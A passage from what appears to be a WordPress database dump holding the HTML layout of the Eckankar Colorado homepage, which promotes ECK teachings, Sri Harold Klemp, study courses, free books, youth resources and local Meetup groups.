url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? <br>\r\n<br>\r\n</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\">\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"\">\r\n<h3 class=\"\"><img class=\"aligncenter wp-image-268029 size-full bg-img\" style=\"margin-top: -11px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/meetup-wide-2.png\" alt=\"\" width=\"564\" height=\"258\"></h3>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 18px; font-weight: 400; text-align: center; color: #333333;\" data-font-family=\"\" data-font-weight=\"400\" data-font-style=\"\">These Colorado discussion groups are open to everyone.<br>\r\nShare or listen to spiritual experiences and insights.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"font-size: 15px;\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-12 col-xs-12 align-column-center col-lg-6\" style=\"border-width: 0px;\">\r\n<div class=\"row\" style=\"border-width: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\" style=\"border-width: 0px;\">\r\n<div style=\"padding: 2em; border-width: 0px;\" class=\"bg-box\">\r\n<h4 class=\"\"><img class=\"bg-img alignnone wp-image-268201 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/newsletter-lg-1.png\" alt=\"\" width=\"564\" height=\"91\"></h4>\r\n<h4 class=\"\" style=\"text-align: center; border-width: 0px; font-size: 27px; line-height: 46px; color: #f28a27; margin-top: 21px;\" data-font-weight=\"600\">Subscribe Today!</h4>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-size: 18px; color: #333333;\">Sign up to receive your local Public Newsletter!<br>\r\nGet all the latest news and events<br>\r\nfrom around the state.</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px;\"><strong>(Initiate Subscriptions are available in the</strong> <a class=\"\" href=\"https://demo2.cloudwp.dev/trial-78x6yt23/initiate-page/\">Initiate Area</a><strong>)</strong></p>\r\n<p style=\"text-align: center; margin-top: 25px;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\">Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(236804,40260,'post_new_post_content','<div>\r\n<p class=\"mod-reset\"><img class=\"aligncenter size-full wp-image-269192\" style=\"margin-top: -101px; position: absolute; z-index: 1;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/10/wave-white-2-300-height.png\" alt=\"\" width=\"1920\" height=\"165\"></p>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -245px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 23px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"border-width: 0px; padding: 0em 1%;\">\r\n<div class=\"bg-video bg-video-1\" data-imhwpb-draggable=\"true\" style=\"border-width: 0px;\">\r\n<p>[embed height=\"315\" width=\"560\"]https://youtu.be/s78XVcM7HWI[/embed]</p>\r\n</div>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6 bg-alpha-491\" style=\"border-width: 0px; padding-bottom: 0em; margin-bottom: 5px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\'); background-size: cover; background-position: 50% 50%;\" data-alpha=\"0.38\" data-bg-uuid=\"bg-alpha-491\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-bk.jpg\">\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; margin-top: 17px;\"><img class=\"alignright wp-image-268059 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/03/free-eck-books-lg-2-1.png\" alt=\"\" width=\"317\" height=\"260\"></p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 38px; line-height: 28px; font-family: \'Raleway\'; font-weight: 500; margin-top: 24px; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Free</p>\r\n<p class=\"color1-color\" style=\"text-align: left; border-width: 0px; font-size: 37px; line-height: 31px; font-family: \'Raleway\'; font-weight: bold; margin-left: 6px;\" data-font-family=\"Raleway\" data-font-weight=\"700\" data-font-style=\"\">ECK Books</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; padding: 0%; margin-left: 6px; color: #615b5b; line-height: 22px; margin-top: 16px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">The free-book offer includes two titles:</p>\r\n<p class=\"\" style=\"text-align: left; border-width: 0px; font-weight: 600; font-size: 18px; margin-left: 6px; color: #615b5b; line-height: 23px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\"><em>ECKANKAR—Ancient Wisdom for Today</em> and <em>Is Life a Random Walk? 